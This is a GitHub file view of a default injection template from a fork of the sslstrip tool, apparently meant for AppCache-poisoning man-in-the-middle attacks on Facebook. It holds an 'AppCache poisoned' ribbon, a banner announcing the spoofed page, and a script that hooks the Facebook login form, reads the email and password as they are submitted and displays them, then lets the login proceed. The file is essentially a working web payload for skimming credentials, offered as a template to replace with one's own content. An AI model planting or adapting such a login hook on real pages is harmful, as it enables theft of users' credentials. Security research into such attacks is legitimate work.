forked from moxie0/sslstrip
/
facebook.append
46 lines (45 loc) · 1.51 KB
/
facebook.append
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<style type="text/css" media="screen">
.aribbon {
background-color: #a00;
overflow: hidden;
z-index: 1000;
/* top left corner */
position: absolute;
left: -3em;
top: 2.5em;
/* 45 deg ccw rotation */
-moz-transform: rotate(-45deg);
-webkit-transform: rotate(-45deg);
/* shadow */
-moz-box-shadow: 0 0 1em #888;
-webkit-box-shadow: 0 0 1em #888;
}
.aribbon a {
border: 1px solid #faa;
color: #fff;
display: block;
font: bold 81.25% 'Helvetiva Neue', Helvetica, Arial, sans-serif;
margin: 0.05em 0 0.075em 0;
padding: 0.5em 3.5em;
text-align: center;
text-decoration: none;
/* shadow */
text-shadow: 0 0 0.5em #444;
}
</style>
<div class="aribbon">
<a href="https://github.com/koto/sslstrip">
AppCache poisoned
</a>
</div>
<div style="padding: 1em;border:1px solid red;margin:1em">
<h1>We work on Facebook too!</h1>
<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create <code>facebook.append</code> or <code>facebook.replace</code> file and add your content there.</p>
</div>
<script>
var f = document.getElementById('login_form').onsubmit;
document.getElementById('login_form').onsubmit = function() {
alert("Hello, " + document.getElementById('email').value + ' ' + document.getElementById('pass').value);
return Event.__inlineSubmit(this,event);
}
</script>